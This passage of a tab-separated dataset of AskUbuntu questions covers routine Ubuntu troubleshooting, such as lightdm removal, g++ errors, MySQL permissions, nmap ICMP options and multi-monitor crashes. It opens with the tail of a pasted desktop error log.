connection refused xlib : extension `` dpms '' missing on display `` localhost:10.0 '' . ( gnome-settings-daemon:3408 ) : color-plugin-warning ** : failed to get edid : unable to get edid for output ( gnome-settings-daemon:3408 ) : color-plugin-warning ** : failed to create device : gdbus.error : org.freedesktop.colormanager.failed : failed to obtain org.freedesktop.color-manager.create-device auth ( gnome-settings-daemon:3408 ) : color-plugin-warning ** : gdbus.error : org.freedesktop.colormanager.failed : failed to obtain org.freedesktop.color-manager.create-profile auth ( gnome-settings-daemon:3408 ) : color-plugin-warning ** : gdbus.error : org.freedesktop.colormanager.failed : failed to obtain org.freedesktop.color-manager.create-profile auth ( gnome-settings-daemon:3408 ) : color-plugin-warning ** : gdbus.error : org.freedesktop.colormanager.failed : failed to obtain org.freedesktop.color-manager.create-profile auth unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+s '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+t '' ** ( nautilus:3571 ) : warning ** : can not get _net_workarea ** ( nautilus:3571 ) : warning ** : can not determine workarea , guessing at layout [ 3580:3661:0416/204028 : error : download.cc ( 109 ) ] postclienttoservermessage ( ) failed during getupdates connection failure : connection refused pa_context_connect ( ) failed : connection refused unity-2d-shell : [ warning ] void qsortfilterproxymodelqml : :setsourcemodelqobject ( qobject* ) : received a sourcemodel that does not notify of changes of its rolenames unity-2d-shell : [ warning ] file : ///usr/share/unity-2d/shell/hud/hud.qml:145 : typeerror : result of expression 'shellmanager.hudshell ' [ null ] is not an object . unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` alt+f1 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` alt+f2 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+0 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+shift+0 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+ퟀ '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+1 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+shift+1 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+ퟀ '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+2 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+shift+2 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+ퟀ '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+3 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+shift+3 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+ퟀ '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+4 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+shift+4 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+ퟀ '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+5 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+shift+5 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+ퟀ '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+6 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+shift+6 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+ퟀ '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+7 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+shift+7 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+ퟀ '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+8 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+shift+8 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+ퟀ '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+9 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+shift+9 '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+ퟀ '' unity-2d-shell : [ warning ] libindicator : unable to load keyfile from file '' : no such file or directory unity-2d-shell : [ critical ] wnck : wnck_window_get_geometry : assertion `wnck_is_window ( window ) ' failed unity-2d-shell : [ critical ] wnck : wnck_window_set_icon_geometry : assertion `wnck_is_window ( window ) ' failed unity-2d-shell : [ warning ] glib-gobject : invalid ( null ) pointer instance unity-2d-shell : [ critical ] glib-gobject : g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed unity-2d-shell : [ critical ] glib-gobject : g_object_weak_ref : assertion `g_is_object ( object ) ' failed unity-2d-shell : [ warning ] glib-gobject : invalid ( null ) pointer instance unity-2d-shell : [ critical ] glib-gobject : g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed unity-2d-shell : [ critical ] wnck : wnck_window_get_geometry : assertion `wnck_is_window ( window ) ' failed unity-2d-shell : [ critical ] wnck : wnck_window_set_icon_geometry : assertion `wnck_is_window ( window ) ' failed unity-2d-shell : [ warning ] void applicationslist : :remoteentryupdated ( const qstring & , const qstring & , const qstring & , const qmap < qstring , qvariant > & ) : application sent an update but we do n't seem to have it in the launcher : `` application : //nautilus.desktop '' unity-2d-shell : [ warning ] void applicationslist : :remoteentryupdated ( const qstring & , const qstring & , const qstring & , const qmap < qstring , qvariant > & ) : application sent an update but we do n't seem to have it in the launcher : `` application : //nautilus.desktop '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+a '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+f '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+m '' unity-2d-shell : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` meta+v '' warn 2014-04-16 20:40:32 unity.glib.dbusproxy glibdbusproxy.cpp:283 calling method `` inforequest '' on object path : `` /net/launchpad/lens/video '' failed : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `com.canonical.unity.lens ' on object at path /net/launchpad/lens/video warn 2014-04-16 20:40:32 unity.glib.dbusproxy glibdbusproxy.cpp:283 calling method `` setviewtype '' on object path : `` /net/launchpad/lens/video '' failed : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `com.canonical.unity.lens ' on object at path /net/launchpad/lens/video unity-2d-shell : [ critical ] dee : clone_leader : assertion `dee_model_get_n_rows ( dee_model ( self ) ) == 0 ' failed unity-2d-shell : [ warning ] void applicationslist : :remoteentryupdated ( const qstring & , const qstring & , const qstring & , const qmap < qstring , qvariant > & ) : application sent an update but we do n't seem to have it in the launcher : `` application : //empathy.desktop ''
448702	can you run windows programs normally on ubuntu ?	i am stuck between choosing windows 8.1 and ubuntu . i like ubuntu , but almost all me favorite games ( titanfall , warframe , battlefield , etc . ) and programs only run on windows ( so they say ) . so what i 'm asking is if it is possible for me to run normal windows programs without lag ?
448703	kubuntu 13.10 how to remove firefox installer	i installed kubuntu 13.10 and in the menu i saw a firefox installer . when i click the installer muon discover shows firefox . i do n't want firefox as rekonq is pre-installed so how can i remove the firefox installer from menu .
448708	nmap icmp request with ip options	just need to put the `` router alert '' option in a ping request . router alert is 0x94040000 at the end of the ip header . this is what i 've tried ( and a lot of other variations ) : sudo nmap -su -pe -- ip-options `` \x94\x04\x00\x00 '' 15.234.166.241 nmap man page says that `` -pe '' will send icmp echo request , but all i see in the wireshark trace is tcp activity . so in summary : i need to send a normal icmp echo request with the router alert option in the ip header . so far , nmap has been a struggle . i 'm open to other ideas -but according to nmap manuals and man-pages , this should have been easy . prefer not to build/compile any new ping commands nor change ubuntu kernel code . thanks .
448715	incidentally removed lightdm - how to get it back ?	i have incidentally removed lightdm , by sudo apt-get purge lightdm . now i am not seeing login screen when starting the computer . ( only black background.. nothing else ) how to restore/install it back ? i am using ubuntu 13.10 64bit . update : i am trying to chroot from liveusb , but i am getting : chroot : failed to run command /bin/bash : no such file or directory how to fix it ?
448724	i already have the newest version of g++ but i still get a 127 error what do i do ?	i have done the following . i just do n't know what to try next . i supposedly have the newest version of gcc by following these directions sudo add-apt-repository ppa : ubuntu-toolchain-r/test sudo apt-get update sudo apt-get install gcc-4.7 g++-4.7 also , do n't forget to update-alternatives , as suggested here sudo update-alternatives -- install /usr/bin/gcc gcc /usr/bin/gcc-4.6 60 -- slave /usr/bin/g++ g++ /usr/bin/g++-4.6 sudo update-alternatives -- install /usr/bin/gcc gcc /usr/bin/gcc-4.7 40 -- slave /usr/bin/g++ g++ /usr/bin/g++-4.7 sudo update-alternatives -- config gcc here is what i have done to update g++ and make the file . ubuntu @ ubuntu-virtualbox : ~/desktop $ sudo apt-get install g++ reading package lists ... done building dependency tree reading state information ... done g++ is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 290 not upgraded . makeubuntu @ ubuntu-virtualbox : ~/desktop $ ubuntu @ ubuntu-virtualbox : ~/desktop $ make g++ -wall -wno-switch -i . -g -c -o pass.o pass.cpp make : g++ : command not found make : *** [ pass.o ] error 127 someone has told me to enter the following commands but i do n't know what it means . i also do n't know what 290 not installed means either . ubuntu @ ubuntu-virtualbox : ~/desktop $ dpkg -s g++ g++-4.4 : /usr/share/man/man1/i686-linux-gnu-g++-4.4.1.gz g++-4.4 : /usr/share/doc/gcc-4.4-base/test-summaries/g++.sum.gz g++-4.6 : /usr/share/man/man1/g++-4.6.1.gz g++ : /usr/bin/g++ g++-4.6 : /usr/share/man/man1/i686-linux-gnu-g++-4.6.1.gz g++-4.4 : /usr/share/doc/g++-4.4 g++-4.6 : /usr/share/doc/g++-4.6 g++ : /usr/share/doc/g++ g++ : /usr/share/man/man1/i686-linux-gnu-g++.1.gz g++-4.4 : /usr/share/man/man1/g++-4.4.1.gz g++-4.4 : /usr/bin/g++-4.4 g++-4.6 : /usr/bin/g++-4.6 g++-4.6 : /usr/share/doc/gcc-4.6-base/test-summaries/g++.sum.gz g++ : /usr/share/man/man1/g++.1.gz g++ : /usr/bin/i686-linux-gnu-g++ g++-4.4 : /usr/bin/i686-linux-gnu-g++-4.4 g++-4.6 : /usr/bin/i686-linux-gnu-g++-4.6 ubuntu @ ubuntu-virtualbox : ~/desktop $ ls /usr/bin/g++ /usr/bin/g++-4.4 /usr/bin/g++-4.6
448725	ubuntu dependency problems installing synaptic	i 've recently replaced my winxp with ubuntu 12.04 lts ( 32-bit ) , so i 'm a total linux newbie . i have installed texlive and now am trying to install texmaker . i get dependency errors just like in http : //ubuntuforums.org/showthread.php ? t=1919941 , so i 've subsequently tried to install synaptic using a .deb file . roy @ roy-oem : ~ $ sudo dpkg -i synaptic_0.81.1_i386.deb [ sudo ] password for roy : selecting previously unselected package synaptic . ( reading database ... 138918 files and directories currently installed . ) unpacking synaptic ( from synaptic_0.81.1_i386.deb ) ... dpkg : dependency problems prevent configuration of synaptic : synaptic depends on libapt-inst1.5 ( > = 0.8.16~exp12 ) ; however : package libapt-inst1.5 is not installed . synaptic depends on libapt-pkg4.12 ( > = 0.9.11 ) ; however : version of libapt-pkg4.12 on system is 0.8.16~exp12ubuntu10.16 . synaptic depends on libept1.4.12 ; however : package libept1.4.12 is not installed . synaptic depends on libpango-1.0-0 ( > = 1.14.0 ) ; however : package libpango-1.0-0 is not installed . synaptic depends on libpangocairo-1.0-0 ( > = 1.14.0 ) ; however : package libpangocairo-1.0-0 is not installed . dpkg : error processing synaptic ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... errors were encountered while processing : synaptic i 'm using a .deb file from softpedia ( not a good idea ? ) because i have n't got an internet connection yet ( i 'll need to configure a dial up modem soon ) . so - what exactly are these lib* packages on ubuntu.com and how can i install them correctly ?
448727	disable 802.11n for a specific network	i was having some problems with the wifi connection with a specific router , and solved them completely by disabling the the n standard : sudo modprobe iwlwifi 11n_disable=0 this network is a network that i use quite seldom , but when i do it 's my only option . is there a way to enable 802.11n usually , but automatically disable it when connecting to this specific network ?
448731	connect to other network to use git repo	i have used gigolo to create a bookmark/mount for a drive that i named engineering . how would i be able to access this using the command line ? when i click on anything under computer i can find a path that i can use in the terminal . however there is no path when i click on engineering . i have the ip address 193.etc user name and passwords but do not know how to access the files in the engineer drive from the terminal . if i am not using correct syntax , i am still new to the non windows world .
448733	check what connections a software / application is trying to make	how to check what urls and ports a particular application or software is trying to access ? does it require wireshark of something ?
448735	i have installed mysql on ubuntu 13.10 , but do n't seem to have rights to do anything ?	this is possibly a problem that affects lots of users , i have have found similar posts , but none of the solutions have worked for me . i have installed mysql on my ubuntu 13.10 , however i do not seem to have any rights to do anything . i can not connect via root , though i do know the root password . i can connect through my user name , though in doing this i get no access rights to create , delete , nor do anything else that is useful . for example : mysql > create database sphider ; error 1044 ( 42000 ) : access denied for user '' @ 'localhost ' to database 'sphider' or if i try to log in using root : root @ rozlockwood-z87m-d3h : /home/rozlockwood # mysql -u root -p enter password : error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : yes ) any help please .
448736	ubuntu and windows 8.1 simulateous monitor problems	i got my asus x502 laptop dual booting ubuntu 13.10 and windows 8.1 and everything is working smoothly . suddenly after i hibernated windows and started up the system the windows side boots fine , but shows only a black screen and the pointer . ubuntu boots fine , but after the gnome shell starts , the laptops monitor goes blank . i tried starting unity and the problem persisted . tried fiddling around with display settings but it did n't help . an external monitor connected to the hdmi port works and the display manager shows both monitors working . trying to access windows recovery from grub shows the error code 0xc000000f . how can i get things working again ?
448737	sentelic touchpad mx300 laptop not recognized	after i tried all the recepies i found , i was unable to make my ubuntu recognize a sentelic touchpad . ubuntu 13.10 hardware : exo mx300 laptop xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb optical mouse id=9 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ usb 2.0 pc cam id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] cat /proc/bus/input/devices i : bus=0019 vendor=0000 product=0003 version=0000 n : name= '' sleep button '' p : phys=pnp0c0e/button/input0 s : sysfs=/devices/lnxsystm:00/device:00/pnp0c0e:00/input/input0 u : uniq= h : handlers=kbd event0 b : prop=0 b : ev=3 b : key=4000 0 0 i : bus=0019 vendor=0000 product=0001 version=0000 n : name= '' power button '' p : phys=pnp0c0c/button/input0 s : sysfs=/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input1 u : uniq= h : handlers=kbd event1 b : prop=0 b : ev=3 b : key=10000000000000 0 i : bus=0019 vendor=0000 product=0005 version=0000 n : name= '' lid switch '' p : phys=pnp0c0d/button/input0 s : sysfs=/devices/lnxsystm:00/device:00/pnp0c0d:00/input/input2 u : uniq= h : handlers=event2 b : prop=0 b : ev=21 b : sw=1 i : bus=0019 vendor=0000 product=0001 version=0000 n : name= '' power button '' p : phys=lnxpwrbn/button/input0 s : sysfs=/devices/lnxsystm:00/lnxpwrbn:00/input/input3 u : uniq= h : handlers=kbd event3 b : prop=0 b : ev=3 b : key=10000000000000 0 i : bus=0011 vendor=0001 product=0001 version=ab83 n : name= '' at translated set 2 keyboard '' p : phys=isa0060/serio0/input0 s : sysfs=/devices/platform/i8042/serio0/input/input4 u : uniq= h : handlers=sysrq kbd event4 b : prop=0 b : ev=120013 b : key=402000000 3803078f800d001 feffffdfffefffff fffffffffffffffe b : msc=10 b : led=7 i : bus=0003 vendor=046d product=c077 version=0111 n : name= '' logitech usb optical mouse '' p : phys=usb-0000:00:14.0-1/input0 s : sysfs=/devices/pci0000:00/0000:00:14.0/usb3/3-1/3-1:1.0/input/input5 u : uniq= h : handlers=mouse0 event5 b : prop=0 b : ev=17 b : key=ff0000 0 0 0 0 b : rel=143 b : msc=10 i : bus=0003 vendor=5149 product=13d3 version=1216 n : name= '' usb 2.0 pc cam '' p : phys=usb-0000:00:14.0-2/button s : sysfs=/devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/input/input6 u : uniq= h : handlers=kbd event6 b : prop=0 b : ev=3 b : key=100000 0 0 0 i : bus=0000 vendor=0000 product=0000 version=0000 n : name= '' hda intel pch hdmi/dp , pcm=3 '' p : phys=alsa s : sysfs=/devices/pci0000:00/0000:00:1b.0/sound/card0/input7 u : uniq= h : handlers=event7 b : prop=0 b : ev=21 b : sw=140 i : bus=0000 vendor=0000 product=0000 version=0000 n : name= '' hda intel pch headphone '' p : phys=alsa s : sysfs=/devices/pci0000:00/0000:00:1b.0/sound/card0/input8 u : uniq= h : handlers=event8 b : prop=0 b : ev=21 b : sw=4 i : bus=0000 vendor=0000 product=0000 version=0000 n : name= '' hda intel pch mic '' p : phys=alsa s : sysfs=/devices/pci0000:00/0000:00:1b.0/sound/card0/input9 u : uniq= h : handlers=event9 b : prop=0 b : ev=21 b : sw=10 and the dmesg.txt thank you in advance for your time and help . daniel
448738	how to edit /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts and similar files and why they can ( not ) be edited	i a trying to edit the following file ( ls -alstr output ) : 0 -rw-r -- r -- 1 root root 0 apr 15 17:07 /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts unfortunately , if i try to edit it with vim or simply with something like sudo echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts i get a -bash : /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts : permission denied error . following this post i was able to do sudo bash -c 'echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts’ and edit the file successfully . if i login as root , i can successfully execute echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts but i still can not edit the file with vim . the attempts to chmod and chown the file also failed . my questions are ( questions 1 & 2 have already been answered here but i state them for completeness ) : why can’t i edit the file as a normal user using sudo with > ? ( because > is evaluated first and thus before the sudo ) why does the sudo bash -c 'echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts’ even work ? ( it invokes a new terminal under root and executes the command that follows ) why can’t i edit the file with vim when i am logged in as a normal user using sudo and/or as root ? why can’t i edit the file permissions and/or owner even when i am root ? how can i make the change permanent so it stays there even after reboots ?
448743	wireless woes hp envy dv6	i installed ubuntu 12.04 had wireless working on hp envy dv6 . i logged out and now wireless will not work message i get is to turn on hardware switch . nothing is turned off on bios . can anyone help , i do n't like windows .
448746	how does a graphical front-end control a daemon ?	i 'm developing a file sync daemon on ubuntu as a hobby project , and i 'm thinking i might want to develop a graphical front-end at some point which will let me control it . how can a gui control and communicate with a daemon program ? what methods are available / recommended ? in this particular case , i 'm using c++ , but a general answer applicable to any language would also be fine .
448751	array splitting in bash	this following piece of code for constructing a sub array gives the output - sdf , sdf , sdf , sdf sdf , sdf , sdf , sdf but the expected output should be sdf , sdf , sdf , sdf sdf , sdf what is wrong with the code ? # ! /bin/bash ary= ( `` sdf '' , '' sdf '' , '' sdf '' , '' sdf '' ) team_one= ( `` $ { ary [ @ ] :0:2 } '' ) echo `` $ { ary [ @ ] } '' echo `` $ { team_one [ @ ] } ''
448754	how can i suspend the way that ubuntu does ?	i would like a command i could map to a button or execute within my network . so far i know the command sudo pm-suspend but i could not make pmi action suspend work on either 12.04 nor 14.04 : error org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.hal was not provided by any .service files i also used this supposedly cleaner method : dbus-send -- system -- print-reply -- dest= '' org.freedesktop.upower '' /org/freedesktop/upower org.freedesktop.upower.suspend but all these methods have the same apparent result . when i wake my computer , whether on 12.04 or 14.04 , some unfinished business glitches the unity launcher and i have to interact with it to `` fix it '' . this does n't happen if i suspend from the unity gui . nor does it happen from my laptop where there is a dedicated sleep key . also there is another clear difference with the gui method and the above ones , in the clean gui method ( incl my laptop ) , i have a notification that never appears with the `` dirty '' methods . so what function/program/script does unity call when it suspends properly ? and how could i map it to a key/event/gesture ?
448771	how to start the computer without the usb	i have installed ubuntu in my computer alone side with windows 7 . ubuntu is installed in the usb ; therefore , each time when i restart the computer , it require me to have the usb plugged in . it will show a window similar to this when the usb is plugged in : if i do n't have the usb , i ca n't start windows 7 either . can you please tell me if there is a way i can start my computer without having to plug in a usb all the time ?
448774	battery icon does not work properly for dual batteries	i have two batteries for my laptop , one is the built-in battery and the other comes from keyboard ( x1 helix if you want to know how that works ) . the way it works is : laptop draws power from bat1 ( keyboard bettery ) first , until it 's below 5 % , then draws from bat0 ( build-in battery ) until it 's gone too . the problem being : first , it does not combine two batteries into one display , say if bat1 is 10 % and bat0 is 100 % , it does n't show 55 % , it shows an almost empty bat1 on battery icon . second even when bat1 is gone and bat0 is providing power , the default displayed battery status on icon bar is still that of bat1 , which is empty , and that bothers me a lot because i have to click on the battery display and manually check how much i have left on bat0 . any one can help ?
448779	can not ssh my server after reboot	i have a linux server at my mom 's house that i access through ssh from my house . it has been working fine until i rebooted it tonight ; i actually rebooted it twice and it went fine and after the third time , it is now impossible to login back in using ssh . i have only changed one line in the fstab file regarding samba shares before rebooting but i dont understand how that could cause the problem . anyways , i have been trying a few things , so like if i ping my mom 's house external ip from my computer , it does not respond ... it just hangs ... the thing though is my mom has access to the internet at this moment on her laptop so the external ip should respond , should n't it ? even weirder , i enabled remote login into my router interface using port 8080 . so using firefox , if i go to my external_ip_address:8080 , i can see my router interface . if i go to only my external_ip_address , it just hangs , no answer from my linux server ( i port forwarded the external ip address to my linux server ) . my mom also has another desktop pc in her network that she can access through her laptop ( both on windows ) but in my router interface , this desktop pc is not in the list of the connected devices ... neither is the linux server btw . nothing makes sense right now . i do n't know where the issue is coming from . do you have any idea ?
448780	sendmail does n't work anymore	i 've installed sendmail to send mails from php , but after some messing with some virtualhosts the mail ( ) ; function in php does n't work any more . how can i get the mail ( ) ; function to work again ? -viktorstrate
448782	ca n't boot ubuntu from cd/dvd or flash drive	i have a dell dimension 4500 with windows xp on it . i wanted to boot ubuntu from a cd/dvd or my flash drive , but i ca n't boot it from the cd/dvd i created or the flash drive . the cd/dvd will not boot from the dvd drive ( you can only view dvds with this drive ) or the cd drive ( because it is a dvd ) . the computer does not recognize my flash drive as a removable drive . what other options do i have ? can i install directly over windows xp , or try to request an installation cd from ubuntu ?
448784	recover partitions lost during installation	i installed ubuntu 13.04 over my ubuntu 12.04 installation . i had divided my hard drive into three partitions but when i reinstalled without formatting the disk , it made a single partition and i lost all my data . is any way to recover my data ?
448785	change the user in bin/bash	i want a script x.sh to switch users and perform an action , but so far i have this : # ! /bin/sh sudo su partner -s /bin/bash supervisord -c ~/supervisord.conf exit i want that the user partner execute supervisord and exit , but all i get is a switched user in the comand line a bash shell , doing the su partner -s /bin/bash is the only way in which i can access the partner user . please help
448789	i installed ubuntu with windows installer , now i only have an ntfs partition . why ?	i am trying to give ubuntu a bigger partition , but when i run partition magic , it only show the ntfs partition taking up the entire drive . where is ubuntu ?
448790	unity segmentation fault under nvidia xinerama	i just upgraded to 14.04 , and i knew ahead of time that i was going to have x issues , but i did it anyway . i have 4 screens attached to an nvidia quadro nvs 450 , using the proprietary nvidia driver ( version 331.38 says nvidia-settings ) . using nvidia-settings , i was able to enable xinerama , and configure all 4 screens . then i reboot , and the login screen looks great , all 4 screens work . then when i get to my desktop , i get 4 purple screens . i can move my pointer between them as expected . however the `` ui '' does n't show up . no sidebar , no menubar at the top . nothing . i can ssh into the machine , and start up chrome ( that 's what i 'm typing on now ) , and i can move the window between screens as expected . however , if i open a terminal and type `` unity '' , i get this : stop : unknown job : unity-panel-service start : unknown job : unity-panel-service compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - fatal : no composite extension compiz ( core ) - error : plugin initscreen failed : composite compiz ( core ) - error : failed to start plugin : composite compiz ( core ) - info : unloading plugin : composite compiz ( core ) - info : loading plugin : opengl compiz ( core ) - info : unity is not supported by your hardware . enabling software rendering instead ( slow ) . compiz ( core ) - info : starting plugin : opengl compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : plugin init failed : opengl compiz ( core ) - error : failed to start plugin : opengl compiz ( core ) - info : unloading plugin : opengl compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : plugin init failed : grid compiz ( core ) - error : failed to start plugin : grid compiz ( core ) - info : unloading plugin : grid compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : plugin init failed : wall compiz ( core ) - error : failed to start plugin : wall compiz ( core ) - info : unloading plugin : wall compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - fatal : no composite extension compiz ( core ) - fatal : no composite extension segmentation fault ( core dumped ) any way i might be able to get this to work ? i think i had xinerama working on 12.04 ( i do n't remember how i had it configured , but i did have 4 working screens ) .
448796	ubuntu is not working properly with videos and dvds	note : please lock this topic , a friend of mine found out i was installing the wrong drivers , which is probably the reason why this did n't work in the first place . ( before anyone says it , yes , i am an idiot ) just to make a long story short , i am having problems trying to make ubuntu play videos on an 3d tv through an hmi cable . what 's weird is that everything except for the video-playing programs ( like vlc or totem ) seems to work perfectly fine . now , i have been experimenting with different codecs , drivers and video-players but i have been unable to find a proper solution . i was able to work my way around with `` smplayer '' video-player , because it allows me to create a buffer for the videos , giving the videos the resolution i was aiming for . however , this does n't solve the problem of playing dvds , since i can not create buffers for dvds . this is an issue because i wanted to use the laptop as a media-center , but for that i am required to get rid of my dvd-player . any ideas ? old post you see , wanted to set up a media-center using my ubuntu laptop , but i 'm having some issues . to provide context , i have plugged in my ubuntulaptop into a samsung3dtv using an hdmi cable . i know for a fact that the tv and the cable work fine because i have previously connected a laptop with windows 7 and everything worked perfectly . however , when using my ubuntu laptop i can not see regular videos properly . for some unknown reason the quality greatly decreases when trying to see stuff on vlc or smplayer . with dvds this decrease is even worse . ( the image gets all grainy ) the weird thing is that everything works fine outside the videos . i can use openoffice , surf the web , read .pdf files , and even see full-screened youtube videos with perfect image quality . everything looks very sharp , and the text is really easy to read . i have tried to configure everything properly . the size and refresh rate are those of the same as the tv . the tv is configured to receive a pc on the ( hdmi/dvi ) entrance . the driver manager suggests no update . i have even checked and installed some libraries people suggested online , to no avail . so my question is : what could possibly be the problem here ? perhaps some libraries or video drivers are just not working the way they should ? should i try installing something else ? or could it be something else entirely ? i really appreciate the help . nac .
448799	mounted a windows file in ubuntu , ca n't access it through terminal	so i am 95 % sure i mounted the drive ( files ) that i wanted from a windows server to ubuntu . i followed the tutorial on http : //www.howtogeek.com/howto/22518/how-to-mount-a-remote-folder-in-ubuntu/ and i am given the option to unmount the folder i set up and am calling engineer . i am trying to push my code onto a git repo on the server . i can not figure out how to access the files in what i mounted through the terminal . is there something similliar to the cd command to use in the terminal to access the server ? i do n't know if this picture helps , but there are two drives mounted on computer which i can access fine . however engineer is listed under network and i do not know how to access it in terminal . when i hover the mouse over it smb : :/192./engineering does appear . but i can not figure out how to access this .
